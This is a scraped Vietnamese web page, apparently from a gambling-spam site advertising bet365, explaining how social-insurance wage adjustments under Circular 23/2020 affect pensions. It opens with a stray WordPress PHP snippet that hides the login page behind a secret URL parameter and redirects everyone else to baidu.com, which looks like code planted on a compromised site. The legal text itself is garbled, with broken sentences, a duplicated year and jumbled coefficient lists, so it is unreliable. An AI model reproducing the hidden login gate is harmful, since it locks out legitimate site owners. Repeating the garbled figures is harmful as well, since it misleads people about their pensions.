//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Việc điều chỉnh tiền lương đóng BHXH ảnh hưởng như thế nào đến lương hưu? | nhà cái bet365 có uy tín không?_ đăng ký bet365_tỷ lệ cược bet365

Việc điều chỉnh tiền lương đóng BHXH ảnh hưởng như thế nào đến lương hưu?

Luật sư tư vấn pháp luật-Theo quy định tại Điều 63 (2) Luật BHXH năm 2014 thì tiền lương đóng BHXH là căn cứ để tính mức bình quân tiền lương tháng đóng BHXH của người lao động. Làm việc theo chế độ tiền lương do người sử dụng lao động xác định và điều chỉnh theo chỉ số giá tiêu dùng của từng thời kỳ phù hợp với quy định của Chính phủ.

Theo quy định tại Điều 79 Khoản 2 Luật Bảo hiểm xã hội thì mức đóng bảo hiểm năm 2014 được tính trên mức bình quân thu nhập tháng đóng bảo hiểm xã hội của người lao động đã tham gia bảo hiểm xã hội tùy chọn. của Foundation chỉ số giá. Theo quy định của chính phủ, mức tiêu thụ trong từng thời kỳ. – Trên cơ sở này, điều chỉnh tiền lương của người lao động và đóng bảo hiểm xã hội để bù đắp thu nhập hàng tháng do trượt giá, đảm bảo lương hưu của người lao động được điều chỉnh tăng theo tỷ lệ trượt giá trong từng thời kỳ.

Cụ thể hơn, theo Thông tư 23/2020 / TT-BLĐTBXH việc điều chỉnh tiền lương và thu nhập đóng bảo hiểm xã hội sẽ có hiệu lực từ ngày 01 tháng 01 năm 2021 như sau:

– 1995 Tiền lương đã đóng bảo hiểm xã hội trước năm điều chỉnh thành 5,0 hoặc 01; năm 1995 là 4,25; năm 1996 là 4,02; năm 1997 là 3,89; năm 1998 là 3,61; năm 1999 là 3,46; năm 2000 là 3,52; năm 2001 là 3,53; Năm là 3,40; 2003 là 3,29; 2004 là 3,06; 2005 là 2,82; 2006 là 2,62; 2007 là 2,42; 2008 là 1,97; 2009 là 1,84; 2010 là 1,69; 2011 là 1,42; 2012 là 1,30 vào năm 2013; 1,22 vào năm 2013 ; 1,18 năm 2014; 1,17 năm 2015; 1,14 năm 2016; 1,10 năm 2017; 1,06 năm 2018; 1,03 năm 2019; 1,00 năm 2020; 1,00 năm 2021. – Tiền lương tháng đóng BHXH sau khi điều chỉnh hàng năm = tổng số tiền hàng tháng tiền lương đóng BHXH hàng năm x mức điều chỉnh tiền lương đóng BHXH theo l của năm tương ứng Ví dụ 1: Nguyễn Văn A đóng BHXH năm 2010 Tổng tiền lương tháng là 48 triệu đồng nên tiền lương tháng đóng BHXH Ông A đã đóng sau khi điều chỉnh năm 2010 là 81,12 triệu đồng (48 triệu đồng x 1,69).

Do đó, mặc dù năm 2010 A đóng tổng tiền lương tháng đóng BHXH của một lần chỉ là 48 triệu đồng, nhưng coi tổng tiền lương tháng đóng BHXH năm 2010 là 81,12 triệu đồng,

— đối với thu nhập điều chỉnh (năm 2008 là tiền lương tháng đóng BHXH tự nguyện) 1,97; 2009 1,84; 2010 1,69; 2011: 1,42 ; 2012: 1,30; 2013: 1,22; 2014: 1,18; 2015: 1,17; 2016: 1,14; 2017 Năm là 1,10; năm 2018 là 1,06; năm 2019 là 1,03; năm 2020 là 1,00; năm 2021 là 1,00. – — Mức thu nhập tháng đóng bảo hiểm xã hội tự nguyện sau khi điều chỉnh hàng năm = tháng đóng bảo hiểm xã hội hàng năm Mức điều chỉnh tổng thu nhập x thu nhập tháng đóng cho xã hội tương đương mức đóng bảo hiểm xã hội năm trên.

Ví dụ 2: Tổng thu nhập tháng đóng bảo hiểm xã hội năm 2010 của Lê Thị B là 42 triệu đồng, tiền lương tháng đóng bảo hiểm xã hội là thu nhập tháng theo năm 2010 B điều chỉnh thu nhập là 70,98 triệu đồng (42 triệu đồng x 1.69 đồng Việt Nam).

Mặc dù tổng thu nhập bảo hiểm xã hội tháng đã đóng năm 2010 của B chỉ là 42 triệu đồng nhưng tổng thu nhập bảo hiểm xã hội tháng đã đóng năm 2010 là 70,98 triệu đồng. VND và quyền nhận lương hưu theo tỷ lệ điều chỉnh này.

Phạm Thành Hữu, luật sư Đoàn luật sư TP.

nhà cái bet365 có uy tín không?_ đăng ký bet365_tỷ lệ cược bet365